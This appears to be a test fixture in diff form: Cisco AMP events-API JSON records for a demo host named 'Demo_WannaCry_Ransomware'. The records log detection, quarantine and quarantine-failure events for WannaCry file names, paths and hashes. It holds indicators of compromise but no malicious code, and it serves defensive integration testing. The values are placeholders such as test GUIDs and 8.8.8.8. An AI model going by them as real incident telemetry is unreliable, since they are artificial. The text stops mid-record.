+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 